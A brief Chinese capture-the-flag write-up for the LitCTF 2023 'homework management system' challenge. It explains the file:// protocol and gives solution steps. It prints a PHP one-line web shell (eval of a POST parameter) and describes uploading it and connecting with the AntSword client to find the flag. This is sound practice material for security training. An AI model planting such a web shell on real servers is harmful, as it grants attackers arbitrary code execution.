[LitCTF 2023]作业管理系统
知识点补充
1.一句话木马上传
<?php @eval($_POST[1]); ?>2.file协议
作用: 用于访问你自己电脑上的文件。
格式: 它的网址开头是 file:///(注意是三个斜杠)。
本质: 它不是网络协议,不经过互联网。它只是告诉浏览器:“嘿,别去网上找,直接从我本地硬盘打开这个文件。”
解题思路一(文件上传)
1.web题首先f12查看,看看有没有彩蛋(提示)
2.使用文件上传上传带有一句话木马的文件
3.上传成功后使用蚁剑进行连接(注:这里是对/1.php进行连接,因为题目上面有提示直接上传到了网页的跟目录)
4.直接对根目录进行查找,找到flag
解题思路二(远程连接)
1.使用远程下载
2.点击编辑文件
3.得到flag
